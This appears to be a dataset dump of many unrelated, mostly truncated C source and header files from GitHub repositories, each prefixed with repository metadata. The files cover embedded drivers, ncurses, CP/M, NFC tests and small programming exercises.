0829a1f0769897977297dc43eff25265a56ae8e0 | 862a919cf7bb5a2ac3cbe5d77543474f82dca9de | /Projects/ble/SimpleBLEPeripheral/Source/ADC.h | 93ee5282ea4857b8b57e9d9034e19454da45469a | [] | no_license | Tab-cloud/RedStore_BLE | 831c5fba56be0b7747192a5b3ab14f80b02be4d1 | 9193d6de129aad31b9e963b5ec3a8cdad341f25b | refs/heads/master | 2022-12-26T10:15:18.072095 | 2020-10-07T02:55:58 | 2020-10-07T02:55:58 | 301,910,670 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 923 | h | #ifndef _ADC_H_
#define _ADC_H_
/************************************************************************************************************************/
/****************************************************Include*************************************************************/
/*****************************************... | [
"939104325@qq.com"
] | 939104325@qq.com |
4238fa63f98c2bb2a162b85055d434ca33a06384 | 5b7412a3b1a52215b37ae4372eb77f5517b97bdb | /LaseriOSBuildv1/Classes/Native/mscorlib_System_Collections_Generic_Dictionary_2_Enumerator__21MethodDeclarations.h | df470b4703444e155798a13cc3189bd151908f2e | [] | no_license | MishMick/Laser-Defender | 54dd553143c16fa3e56f7c0e225e79d0832c2bb6 | db796e2b197a0628bac5ddc7927264b834be00de | refs/heads/master | 2021-05-04T10:20:55.305230 | 2016-01-12T09:55:48 | 2016-01-12T09:55:48 | 43,044,445 | 0 | 0 | null | 2018-10-17T07:09:24 | 2015-09-24T04:19:01 | C++ | UTF-8 | C | false | false | 6,064 | h | #pragma once
#include <stdint.h>
#include <assert.h>
#include <exception>
#include "codegen/il2cpp-codegen.h"
// System.Collections.Generic.Dictionary`2/Enumerator<System.Object,System.Boolean>
struct Enumerator_t2247;
// System.Object
struct Object_t;
// System.Collections.Generic.Dictionary`2<System.Object,System.B... | [
"mishallovic@gmail.com"
] | mishallovic@gmail.com |
2099f20610aba4da7966c1a47bbb02b219cc2553 | d4a2c50a90792600c4d864fffe9c1a9d1ebd6acc | /pc-csn/F.C | 3764aebb11ff8715e13a307ca7acc31cd182a682 | [] | no_license | iwasen/MyProg | 3080316c3444e98d013587e92c066e278e796041 | a0755a21d77647261df271ce301404a4e0294a7b | refs/heads/master | 2022-12-30T00:28:07.539183 | 2020-10-25T06:36:27 | 2020-10-25T06:36:27 | 307,039,466 | 0 | 4 | null | null | null | null | UTF-8 | C | false | false | 505 | c | #include <stdio.h>
#include <dos.h>
void t_getfont(int code, unsigned char *font)
{
union REGS reg;
void far *fptr;
reg.h.ah = 0x14;
reg.x.dx = code;
fptr = font;
reg.x.cx = FP_OFF(fptr);
reg.x.bx = FP_SEG(fptr);
int86(0x18, ®, ®);
}
main(int argc, char *argv[])
{
unsigned char fon... | [
"git@iwasen.jp"
] | git@iwasen.jp |
32941ff25cb28a96d2ee4e7e0296cff211ba2b10 | 55e217ca35428b7ae00120b4c06d6acbac767e7c | /pyramid problem/8.c | 3e5bdbaf677a310abc0b9b6ae8d65183f61d8ada | [] | no_license | mahim007/C-CPP-Practice | 16125461715f828602cea13aebd1d5258811b926 | 2529dc727e9dd324ddb9a615f5590afee0d74bed | refs/heads/master | 2020-03-11T21:38:31.914786 | 2018-10-05T19:14:49 | 2018-10-05T19:14:49 | 130,271,100 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 261 | c | #include<stdio.h>
int main()
{
int i,j,n;
printf("n=");
scanf("%d",&n);
for(i=n;i>=1;i--) {
for(j=1;j<=n;j++)
printf("%d",i);
printf("\n");
}
return 0;
} | [
"ashrafulmahim@gmail.com"
] | ashrafulmahim@gmail.com |
63ec25331dacace064a02417d7481ad555e40b5e | 0c8158c4edb7aae37e5715d883a16a523afafd65 | /parallel_approximation/OE_RC_mc_new.c | 45e4c242ee8b59cbb0ce0c0776436e68c0d984a3 | [] | no_license | Kentoooooooo/tasks | 5f0cbdf3b2f57cc0edb6c6ac3cf7ecc20c27cf2e | b097cb6e1af99ed2e28bab37e8ba80ceb0c6741d | refs/heads/master | 2020-08-10T01:17:25.299712 | 2019-10-10T15:34:35 | 2019-10-10T15:34:35 | 214,219,765 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 34,421 | c | #include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <string.h>
#include <time.h>
#include <windows.h>
#include "dSFMT.h"
#define C 2.99792458e8
#define h 1e-10
#define dh 1e-4
#define EPS 1e-8
#define WGSD 1.0e4
#define OUT_NODE_STATE 0
struct parameter {
double tau_L, tau_H, delay[2], ... | [
"noreply@github.com"
] | Kentoooooooo.noreply@github.com |
9d54a55ec1eb86583fb8234892d91b8f844a0c57 | d1cd0e61a0d5ed2b5341bc9e996625fb677f4f23 | /lib/asn1c/nr_rrc/InterRAT-Parameters.h | 0db59788477315d2cda5b477e96ef19d4d4ade19 | [
"Apache-2.0"
] | permissive | soumyadeepbi/free5GRAN | 251bff61bfd30628f0861a285086ac94368de34f | 4e92458e955f59d86463ce65ea08c5c06cc8a48e | refs/heads/master | 2023-07-28T20:23:42.404672 | 2021-10-06T16:32:47 | 2021-10-06T16:32:47 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,681 | h | /*
* Copyright 2020-2021 Telecom Paris
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in... | [
"aymeric@dejavel.fr"
] | aymeric@dejavel.fr |
fd6e1794b19b28fd0207c66e7bd34f32d1765a6d | 24d856d98c85a319d53be2768ccc176a50873fa3 | /linux-lts-quantal-3.5.0/drivers/media/video/cpia2/cpia2_v4l.c | 55e92902a76c6292900b62f4eec8c233b18ce8fe | [
"GPL-1.0-or-later",
"Linux-syscall-note",
"GPL-2.0-only",
"BSD-2-Clause"
] | permissive | dozenow/shortcut | a4803b59c95e72a01d73bb30acaae45cf76b0367 | b140082a44c58f05af3495259c1beaaa9a63560b | refs/heads/jumpstart-php | 2020-06-29T11:41:05.842760 | 2019-03-28T17:28:56 | 2019-03-28T17:28:56 | 200,405,626 | 2 | 2 | BSD-2-Clause | 2019-08-03T19:45:44 | 2019-08-03T17:57:58 | C | UTF-8 | C | false | false | 34,064 | c | /****************************************************************************
*
* Filename: cpia2_v4l.c
*
* Copyright 2001, STMicrolectronics, Inc.
* Contact: steve.miller@st.com
* Copyright 2001,2005, Scott J. Bertin <scottbertin@yahoo.com>
*
* Description:
* This is a USB driver for CPia2 based... | [
"jflinn"
] | jflinn |
645cdc3e02a08d9b3ab767c1fb4250a7c1fdd611 | f309f840c19161dc966225eb8f185d3f8e4da9b8 | /src/audioplayer.h | 36914df022b8f1f47934a2981dbe04a6779056a4 | [
"MIT"
] | permissive | LouisH-760/caudioplayer | 4325346bf6ff5fc6f231f6ccc3689eca115d4e90 | bed886060bf448dec5fca883afa8769355e4b491 | refs/heads/main | 2023-01-23T11:19:47.610677 | 2020-11-28T21:02:25 | 2020-11-28T21:02:25 | 316,818,962 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,091 | h | #ifndef audioplayer_h
#define audioplayer_h
#include <stdint.h>
/*!
* \brief Starts the audio player
* \param fileName The name of the audio file.
* \param bufferSize The buffer capacity, in number of \c AudioChunks.
*/
void startAudioPlayer(const char *fileName, int bufferSize);
/*!
* \brief Finishes the progr... | [
"arthur.500@gmail.com"
] | arthur.500@gmail.com |
2c00c542085a667543201c8808351c27270e7ab0 | 25bcfd9c183d9b1323ee348ad80a8434b2142727 | /l8d.c | f2bc785a2540723a102eef04880cc0288d1a21be | [] | no_license | otrekauss/laby | 43d257afc529212944abf6274026aed18f17796d | e29a0cfed2a2a9b7ca057c3c59147289c632d7c7 | refs/heads/main | 2023-04-30T12:51:41.953845 | 2021-05-21T13:48:00 | 2021-05-21T13:48:00 | 351,344,615 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 733 | c | #include <stdio.h>
#include <termios.h>
#include <unistd.h>
#include <ctype.h>
int mygetch()
{
struct termios oldt, newt;
int c;
tcgetattr(STDIN_FILENO, &oldt);
newt = oldt;
newt.c_lflag &= ~(ICANON | ECHO);
tcsetattr(STDIN_FILENO, TCSANOW, &newt);
c = getchar();
tcsetattr(STDIN_FILENO, TCSANOW, &oldt);... | [
"user@ws1013402140.pm"
] | user@ws1013402140.pm |
22c8880e3bcb9e31a31fa4a963b0c8d288a6c489 | 5aa1682c0b97f73bc617f18dab104f68dc21041f | /source/lorawan/apps/LoRaMac/classB/NucleoL152/main.c | 5acf1e94af5342c70e3799ed04767a45afe30478 | [] | no_license | neeveecomm/lorawan-node | 11e73781ce8c06d3d1a3e0f98c359fc8d4a2e9fc | 97773434a70229c28debf03904bd293be030e953 | refs/heads/master | 2020-04-19T15:12:12.388133 | 2019-01-30T02:50:57 | 2019-01-30T02:50:57 | 168,267,002 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 46,222 | c | /*!
* \file main.c
*
* \brief LoRaMac classB device implementation
*
* \copyright Revised BSD License, see section \ref LICENSE.
*
* \code
* ______ _
* / _____) _ | |
* ( (____ _____ ____ _| |_ _____ ___... | [
"nvhariharan@neeveetech.com"
] | nvhariharan@neeveetech.com |
8b131691961a32a7ff949b4fa0e26b107a5b6dec | d849be570ede7e72493f9eb705af3e9dda9175c7 | /03memory/memory.c | 00d6050386e9078dfdc6c261aa64cd304689958f | [] | no_license | Gloomyer/Windows_Driver_study | d68b2141ddda3e448ad2c3db187ab4bee2867fb8 | 27c099662b9982e1c7f7f6474bd9bd2befd6733c | refs/heads/master | 2020-04-01T17:29:00.886323 | 2018-10-17T09:56:02 | 2018-10-17T09:56:02 | 153,432,562 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,115 | c | #include <ntddk.h>
VOID DriverUnload(PDRIVER_OBJECT driver) {
DbgPrint("first : Our Driver is unload.\n");
}
NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING regPath) {
NTSTATUS status;
UNICODE_STRING dst = {0};
UNICODE_STRING src = RTL_CONSTANT_STRING(L"source string..");
#if DBG
_asm int 3
#en... | [
"gloomyneter@gmail.com"
] | gloomyneter@gmail.com |
3f444637e80749a8572d7f9c77c8bc9554cacf10 | 1e5aad82e7a8b3de3d910b823d56b67af253f9dd | /src/compiler.h | c7c2fa0fa7385f403b529c1d2b214e3408611fc5 | [
"MIT",
"BSD-3-Clause"
] | permissive | doytsujin/PCrap | fa8c508c8b66fd80b4ab6ec2a3391aad57982437 | 5d45d6d416e81a3564a99f28982f6c094845f9c5 | refs/heads/master | 2023-07-02T20:25:01.222063 | 2021-08-07T01:43:13 | 2021-08-07T01:43:13 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 413 | h | //> Scanning on Demand compiler-h
#ifndef pcrap_compiler_h
#define pcrap_compiler_h
//> Strings compiler-include-object
#include "object.h"
#define MAX_NUMBER_VALUE 1000000
#define skip -1
ObjFunction* compile(const char* source, ObjLibrary* library);
//< Calls and Functions compile-h
//> Garbage Collection mark-com... | [
"roofoof500@gmail.com"
] | roofoof500@gmail.com |
fadd6347f4e41a57085bec7721094578b0a770b7 | 376e1818d427b5e4d32fa6dd6c7b71e9fd88afdb | /time/xdiary/patches/patch-xtools_xitInfoToc.c | 656f0e23932f96269f779df26ef39816617004c0 | [] | no_license | NetBSD/pkgsrc | a0732c023519650ef821ab89c23ab6ab59e25bdb | d042034ec4896cc5b47ed6f2e5b8802d9bc5c556 | refs/heads/trunk | 2023-09-01T07:40:12.138283 | 2023-09-01T05:25:19 | 2023-09-01T05:25:19 | 88,439,572 | 321 | 138 | null | 2023-07-12T22:34:14 | 2017-04-16T20:04:15 | null | UTF-8 | C | false | false | 945 | c | $NetBSD: patch-xtools_xitInfoToc.c,v 1.1 2023/01/22 20:08:17 vins Exp $
Avoid int to pointer conversion warnings.
--- xtools/xitInfoToc.c.orig 1997-05-04 13:15:28.000000000 +0000
+++ xtools/xitInfoToc.c
@@ -35,6 +35,7 @@ static char SCCSID[] = "@(#) Module: xit
-- Include files
------------------------------------... | [
"vins@pkgsrc.org"
] | vins@pkgsrc.org |
fb596f56268975bfab9e7d785153c7f6311bb191 | 7ad69adeb574f608efbd89037781466689edeb2f | /ISO14443_GYF_2018-05-20_Sy.c | 72cd9006ac275eb8adba1fecef1354cff57b9640 | [] | no_license | gfreny/RF17550_Lib | 945601d6b70b013bd440dd080dde3d4ef6aef66d | c576e9ef82aa1fffa89f4147c9841e86ad7c28f7 | refs/heads/master | 2020-06-09T14:52:26.648021 | 2019-06-24T03:03:00 | 2019-06-24T03:03:00 | 193,454,976 | 0 | 0 | null | null | null | null | GB18030 | C | false | false | 29,939 | c | /********************************************************************************
* Copyright (c) 2012, Beijing Tongfang Microelectroics Co., Ltd.
* All rights reserved.
* Module: ISO14443.c
* Author: Cui Lu
* Version: V1.0
* History:
* 2013-05-30 Original version
*****************************************************... | [
"gfreny@163.com"
] | gfreny@163.com |
6c4e5d31459113700a14ed9b8bd09fbd9b1bff18 | 20fb4d1dedb41a50664f5b86cd762bdc4e372e30 | /6-1/6-1/6-1.c | 5d69e5b25e93cec29887ea00a406bddcfa6a74e7 | [] | no_license | XcAngel/Experiment | 0f17ffd6920b49a59bb90f607bc93597277b68b2 | 6c1563c50405a857c6a74b291a2635e6206ad67e | refs/heads/master | 2021-01-23T15:56:06.010747 | 2015-09-29T10:04:35 | 2015-09-29T10:04:35 | 42,649,645 | 0 | 0 | null | null | null | null | GB18030 | C | false | false | 512 | c | #include <stdio.h>
int main()
{
void swap(int *p1, int *p2);
int arr[10];
int i, j;
printf("请输入10个数字\n");
for (i = 0; i < 10; i++)
{
printf("%d = ", i + 1);
scanf("%d", &arr[i]);
}
for (i = 0; i < 10; i++)
{
for (j = i + 1; j < 10; j++)
{
if (arr[i] > arr[j])swap(&arr[i], &arr[j]);
}
}
printf("输... | [
"xjcknight@gmail.com"
] | xjcknight@gmail.com |
a9b78cbad738b1e69eea0a6e3b1b7ed5cd1f9c64 | ab50ddc591b9463e017888c0ab4d787e4cc76968 | /Examples/AndOrModel/wastedErrComplete.c | cba5928008611465e13e25a01b4976e051a79790 | [] | no_license | arey0pushpa/friendZoned | f5ae4cc25277fd1b5d7593b3e7e2c6a5de9c5ca6 | c496d4bb2b983dbc2c549ef87b91fb2fc1c20786 | refs/heads/master | 2021-05-04T10:52:12.261505 | 2018-10-31T12:32:18 | 2018-10-31T12:32:18 | 46,319,829 | 2 | 0 | null | null | null | null | UTF-8 | C | false | false | 15,208 | c | /* Complete Spec implementation of the V Snare - T Snare MOdel
Github Link
*/
#include <stdio.h>
#include <stdlib.h>
#define M 10
#define N 5
#define snareLength 10
#define len 10
_Bool nondet_bool();
unsigned int nondet_uint();
typedef unsigned __CPROVER_bitvector[M] bitvec... | [
"leadnewindia@hotmail.com"
] | leadnewindia@hotmail.com |
bdb65f5523e3f7ccd97a8573cbb8e65b8d2aee99 | 253f1be75f3c71d2d2d28e62b86d40e52066b49b | /app/src/main/cpp/gstreamer-1.0/armv7/include/nettle/ecdsa.h | 693aca8b0e6b125450ef95f791c521381ca9b056 | [
"Apache-2.0",
"MIT",
"BSD-3-Clause"
] | permissive | diux-dev/rosettadrone | 6a51f1181865666d056fbab6778ccbff9282fdef | 7ff68c07221f12d97dc4a27402d6bd874b18a28d | refs/heads/master | 2023-03-05T04:05:18.420379 | 2023-02-22T23:58:32 | 2023-02-22T23:58:32 | 125,117,089 | 100 | 60 | BSD-3-Clause | 2020-02-28T15:14:10 | 2018-03-13T21:29:51 | C | UTF-8 | C | false | false | 2,924 | h | /* ecdsa.h
Copyright (C) 2013 Niels Möller
This file is part of GNU Nettle.
GNU Nettle is free software: you can redistribute it and/or
modify it under the terms of either:
* the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, ... | [
"noreply@github.com"
] | diux-dev.noreply@github.com |
307fa91febfdbedc2e98d698768fb205e5a5bc69 | 6f6035a1c3bb1d0227c98c8ba20c7c0d89907177 | /chroma/system/drivers/keyboard.c | a4fe5730488c8019637bcdd5af6c92dd8c3459a3 | [] | no_license | ColonelGerdauf/Chroma | 7274243a74640f55d26e8bf23503f934a43e82a7 | c69cd6024853f36d20681fb43bc1c204b209971c | refs/heads/master | 2022-11-16T11:18:38.271911 | 2020-07-07T20:39:28 | 2020-07-07T20:39:28 | 277,921,080 | 0 | 0 | null | 2020-07-07T20:59:51 | 2020-07-07T20:59:51 | null | UTF-8 | C | false | false | 2,054 | c | #include <kernel/chroma.h>
char keys[128] = {
0, 27,
'1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '-', '=', '\b',
'\t', 'q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', '[', ']', '\n',
0,
'a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l', ';', '\'', '#',
0,
'\\', 'z', 'x', 'c', 'v', 'b',... | [
"curle@gemwire.uk"
] | curle@gemwire.uk |
18e01dafe9ee6dbdad9bfe74d2bd4f5571f867b9 | 74e32bf643a3bbcf03b7e535390dc37f6c7f45ac | /android/glibc/glibc_build/tlsdesc.h | f1f193a79be98304342730f9f65eed43a570022d | [] | no_license | stein-one/lxc-in-android | 896757775a5a610454d14a774d5d4b98a734ee06 | 51000b72681e51030458afd05e83c5c68339085e | refs/heads/master | 2021-01-19T02:13:30.404248 | 2013-05-13T10:48:09 | 2013-05-13T10:48:09 | 10,029,258 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 99 | h | #define TLSDESC_ARG 0
#define TLSDESC_GEN_COUNT 8
#define TLSDESC_MODID 0
#define TLSDESC_MODOFF 4
| [
"dirk@stanke.eu"
] | dirk@stanke.eu |
830cfe416e65828dac40fda10dac1780a9bdd687 | a790e26b6dc3e56b987fb2a9fe4c4dcc862db5a1 | /libft/ft_memcpy.c | ac320304ddf354ec246c57bd6a20fb3f51039cc1 | [] | no_license | borislavfra/fdf | 102633f8eb0d96ef4207cf428451de2b2a47c020 | b4d7cbf6a0332624820db59c04f6ce05a1c77e89 | refs/heads/master | 2020-09-09T10:06:37.231837 | 2019-11-21T14:34:12 | 2019-11-21T14:34:12 | 221,418,904 | 0 | 1 | null | null | null | null | UTF-8 | C | false | false | 1,072 | c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* ft_memcpy.c :+: :+: :+: ... | [
"dwalda-r@at-p4.21-school.ru"
] | dwalda-r@at-p4.21-school.ru |
eb05cad7ad3d39a20201aeb0f4af6e44b0ebe6ca | fe706217ae47172f3264e3eb5277195b2371a891 | /bberr006_ccamp032_lab9/bberr006_ccamp032_lab9_part3/bberr006_ccamp032_lab9_part3/main.c | 78411dc5d30618c548f1b359a88f845d2584a386 | [] | no_license | ccamp032/CS120B-Labs | 0a34669c79ab440fb06d0372cc57670327eceba6 | c859e9f6ad1d79b069ce7beda0815dd9156704ac | refs/heads/master | 2020-04-16T21:24:01.368617 | 2019-06-20T02:28:06 | 2019-06-20T02:28:06 | 165,924,066 | 0 | 0 | null | null | null | null | MacCentralEurope | C | false | false | 3,340 | c | /* Partner(s) Name & E-mail:
* Blake Berry, bberr006@ucr.edu
* Christian Campos , ccamp032@ucr.edu
* Lab Section: 022
*
* Assignment: Lab #9 Exercise #3
*
* Exercise Description:
* Using the ATmega1284ís built in PWM functionality, design a system where a short, five-second melody,
* is played when a button is presse... | [
"camposchristian69@gmail.com"
] | camposchristian69@gmail.com |
63ec1eb055f5eecb0ea674a1aaf8c4e50c135692 | fe01430da3febfc4ba5879d858186a3f6e722da8 | /C/Stack/static/main.c | 236e0c97113d80bead1af32faf26be639ca3ad6f | [] | no_license | MatosThiago/Algoritmos | fcf74fee57a8639c74e2f9f1ef99bf5d9986d9a3 | e17e89942f9f8c0398e4c812c00d528105c29967 | refs/heads/master | 2020-03-14T03:43:51.219658 | 2018-05-27T01:16:05 | 2018-05-27T01:16:05 | 131,426,236 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 174 | c | #include <stdio.h>
#include <stdlib.h>
#include "stack.h"
int main() {
T_stack* stack = allocstack(6);
printf("%d\n", pop(stack));
freestack(stack);
return 0;
}
| [
"thiago.matos882@gmail.com"
] | thiago.matos882@gmail.com |
fa46f4df0f2f315ef1f74fe060442ee7a5630376 | c607fbfa44119fdd8e0cf051c1eeeda122d937dc | /os-related/CPM/DR/stat.c | e575d7feaf2f2086a43678ce5535e0ccff810a01 | [] | no_license | z88dk/z88dk-ext | 9e3eff3f46ae429809cf7c02e09f5f6a1472cd92 | c4b3878c2c20c27377dc76d1bbe9159f4f0152fc | refs/heads/master | 2023-08-26T17:12:10.053997 | 2023-06-22T14:32:13 | 2023-06-22T14:32:13 | 200,907,370 | 8 | 3 | null | 2020-02-07T05:24:23 | 2019-08-06T18:53:02 | C | UTF-8 | C | false | false | 103,766 | c | /****************************************************************************/
/* */
/* S T A T C O M M A N D */
/* ----------------------- */
/* ... | [
"noreply@github.com"
] | z88dk.noreply@github.com |
36670bdb8b059a5122ee4e46c5d7553dc94f0fda | 461526031d005cb4a815f97fe705dc711e2c94d1 | /pattern 33.c | c81249fa61341318b47935568471f61c4d3036b6 | [] | no_license | avneeshgautam/all-pattern-program-in-C-language | 788695a965fc05b979074a30a7b03d8a47b8803f | 941eeb0d4f6ea83454ee50f213adb5e44a406401 | refs/heads/master | 2020-04-05T21:41:16.276788 | 2018-11-24T06:36:20 | 2018-11-24T06:36:20 | 157,229,301 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 286 | c | /*
33)
4
4 3
4 3 2
4 3 2 1
*/
#include<stdio.h>
void main(){
int i,j,n,k;
printf("\n Enter the number:");
scanf("%d",&n);
for(i=1;i<=4;i++){
k=4;
for(j=1;j<=i;j++){
printf("%d ",k);
k--;
}
printf("\n");
}
}
| [
"noreply@github.com"
] | avneeshgautam.noreply@github.com |
4119311882ebdb6255d39311ba9f5c5e352412ca | 0f796164fd575b168d59e94cb3f0ae9ed766ed4d | /mm-camera2/media-controller/modules/isp/hw/modules/rolloff/pca_rolloff32/pca_rolloff32_reg.h | 3628eba0654ad4a34a9ae490c5e01cb58c615537 | [] | no_license | zoggn/proprietary_qcom_mm-camera | 02b30f42ae3783e2bf893d7e5342baec6f128251 | 44c4e4b282afac08839088395902fb811fc30d3d | refs/heads/master | 2021-01-25T11:49:11.462639 | 2017-06-10T15:13:59 | 2017-06-10T15:13:59 | 93,947,251 | 3 | 1 | null | null | null | null | UTF-8 | C | false | false | 2,541 | h | /*============================================================================
Copyright (c) 2013 Qualcomm Technologies, Inc. All Rights Reserved.
Qualcomm Technologies Proprietary and Confidential.
============================================================================*/
#ifndef __PCA_ROLLOFF32_REG_H__
#def... | [
"kurkov.nikita@gmail.com"
] | kurkov.nikita@gmail.com |
83160567a6f80662d03a25a5e974bbaa19d139c5 | d72d38f9d7be37317bdfc0884d26e5c51860a311 | /srcs/throw_error.c | 6ec96126596e36499cdbc3cac1fbe480a147b713 | [] | no_license | sploadie/pokemon_hex | f0f00603fd10193f8a6660630d0ef6475740ed17 | b252ad2ee9e7aff9ec8c4b3b78c3ae519f6cc497 | refs/heads/master | 2021-01-10T19:03:44.400671 | 2015-03-09T14:32:45 | 2015-03-09T14:32:45 | 31,380,574 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 974 | c | /* ************************************************************************** */
/* */
/* ::: :::::::: */
/* throw_error.c :+: :+: :+: ... | [
"tanguygauvrit@gmail.com"
] | tanguygauvrit@gmail.com |
ed03e55ce1ac30d9be2c9a12b4253732d526e459 | 449e8b9b240adefb05ec2d06ececeb3fd543637b | /hybris/tests/test_nfc.c | dcdbcbe9d77d10ed08fde10d7be3da8142142041 | [
"Apache-2.0"
] | permissive | miksa/libhybris | 3c5bb4fc21a6b7c4b617e480a1c1301e1704f0d4 | ac5fa670dfd76bb8a251a78b61e694d5fc862e0a | refs/heads/master | 2020-12-24T17:35:55.739699 | 2013-09-10T10:42:35 | 2013-09-10T10:54:12 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 4,465 | c | /*
* Copyright (C) 2012 Jolla Ltd.
* Contact: Aaron McCarthy <aaron.mccarthy@jollamobile.com>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENS... | [
"aaron.mccarthy@jollamobile.com"
] | aaron.mccarthy@jollamobile.com |
ef743dce4c0f6aa2ce7a8a57fd5d72f5ce0d2263 | 9d2c1a76ae2498136faeeae8a59f40b02a54b837 | /linux/ncurses/ncurses/window/textarea.c | 99e5827c0e27d131686177787545e1b518f8a2c1 | [] | no_license | fov42550564/command | a36ed75aec36eb86a1541a8c05bae2677ad7449f | a0aadf1c1f906fdcf7bf7a792b5080b74e523e75 | refs/heads/master | 2021-07-16T06:19:41.857617 | 2021-03-12T09:20:31 | 2021-03-12T09:20:31 | 23,693,076 | 0 | 1 | null | 2021-03-02T02:09:24 | 2014-09-05T06:43:29 | C | UTF-8 | C | false | false | 45,271 | c | /*
* =====================================================================================
*
* Filename: textarea.c
*
* Description: textarea c file
*
* Version: 1.0
* Created: 12/28/11 23:57:08
* Revision: none
* Compiler: gcc
*
* Author: fangyunjiang (fang), 42550564@qq.com
* Company: star-net
... | [
"42550564@qq.com"
] | 42550564@qq.com |
ede73384c94febdb3e233d4297c74f27b8ff4fb2 | b373d4c0351ee1a9adde5327807b13018eef1581 | /Tree_Sort.c | 9622f6b2be1c33039d042e7de7d84d0c4c3dd5b4 | [] | no_license | Biplab097/Algorithms | 9a4d9b78b37d1f9794fd9a66e083ad966be1bf28 | 05367de6ff7e68a835c3aaede0d52ee73f191db3 | refs/heads/master | 2020-08-01T23:09:54.257318 | 2019-11-12T18:15:15 | 2019-11-12T18:15:15 | 211,151,015 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,154 | c | #include<stdio.h>
#include<stdlib.h>
struct tree
{
int data;
struct tree *left;
struct tree *right;
}typedef t;
t* root = NULL;
t* creat_node(int);
t* insert_node(t*,int);
void tree_sort(t*);
int main(int argc,char const* argv[]){
int n,i;
FILE *r;
r = fopen(argv[1],"r");
fscanf(r,"%d",&n);
... | [
"biplabbarman097@gmail.com"
] | biplabbarman097@gmail.com |
0bb1d7e8a06d0346e4e0114ac3d2b877c3b3c43a | 9b0c8d9c23de0a9c0864109d371eeff9a3b86fb3 | /components/ssd1306/src/ssd1306_generic.c | 0296d049228bdcb11be672d2eb828e1e145b68d2 | [
"MIT"
] | permissive | mosy/T-Camera | fea34e8eb44a803fe85e046d9d51d6a15eb6c956 | 1f3e4711c96a1d5d559143225e52381a1fdfa289 | refs/heads/master | 2023-04-06T14:20:03.263297 | 2019-04-22T02:28:35 | 2019-04-22T02:28:35 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 11,834 | c | /*
MIT License
Copyright (c) 2016-2018, Alexey Dynda
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, c... | [
"lewishe@outlook.com"
] | lewishe@outlook.com |
14c852bd0344bb3eaeb6475d21b7f1010d02c1dd | c2cedcf36667730f558ab354bea4505b616c90d2 | /players/angel/area/town/land/land_03.c | 929eac2f2dfa7fac1388d0d72d06f315696d3e3b | [] | no_license | wugouzi/Nirvlp312mudlib | 965ed876c7080ab00e28c5d8cd5ea9fc9e46258f | 616cad7472279cc97c9693f893940f5336916ff8 | refs/heads/master | 2023-03-16T03:45:05.510851 | 2017-09-21T17:05:00 | 2017-09-21T17:05:00 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,598 | c | /* *
* File: /players/angel/area/town/land/land_03.c *
* Function: room *
* Author(s): Angel@Nirvana *
* Copyright: Copyrigh... | [
"rump.nirv@gmail.com"
] | rump.nirv@gmail.com |
4d9440c7603177647565ef936261a330b00b313a | 321c97926d030fc16eac9906c9dcffab91eb8a76 | /WideTimers/RTE/_Target_1/RTE_Components.h | 79349f1dc98103095a16253a3a34f086c8d01b49 | [] | no_license | Junaidk11/tiva-c-modules | 71a68b5daa9b7b3b9278917d691f08be5cc7927a | 30a6bcfa4a0034bcbb055384b00e52b12023368c | refs/heads/master | 2021-06-25T01:03:49.783595 | 2021-02-05T03:13:39 | 2021-02-05T03:13:39 | 195,461,381 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 339 | h |
/*
* Auto generated Run-Time-Environment Configuration File
* *** Do not modify ! ***
*
* Project: 'WideTimer'
* Target: 'Target 1'
*/
#ifndef RTE_COMPONENTS_H
#define RTE_COMPONENTS_H
/*
* Define the Device Header File:
*/
#define CMSIS_device_header "TM4C123.h"
#endif /* RT... | [
"junaidkhan@d207-023-222-133.wireless.sfu.ca"
] | junaidkhan@d207-023-222-133.wireless.sfu.ca |
660278414e1b1fc61966b478d8a6eef06d975a08 | 1c5cb5e5536f6c02b7919942e02bcf6cbfd493da | /0x1D-binary_trees/13-binary_tree_nodes.c | 0a6e219900315df30cf744061218156d121482b7 | [] | no_license | tyedge/holbertonschool-low_level_programming | 04e254501b6c1980da981779bac42cb79813d683 | 0765b0e1de9ef239ce618ed61dfee8b7d9bd80f7 | refs/heads/master | 2020-04-21T13:42:04.418506 | 2019-08-30T02:45:57 | 2019-08-30T02:45:57 | 169,608,086 | 2 | 1 | null | null | null | null | UTF-8 | C | false | false | 583 | c | #include "binary_trees.h"
/**
* binary_tree_nodes - this function counts the nodes with at least 1 child in
* a binary tree
* @tree: pointer to the root node of the tree to count the number of nodes
*
* Return: number of nodes or 0, if tree is NULL
*/
size_t binary_tree_nodes(const binary_tree_t *tree)
{
size_... | [
"tyedge.inc@gmail.com"
] | tyedge.inc@gmail.com |
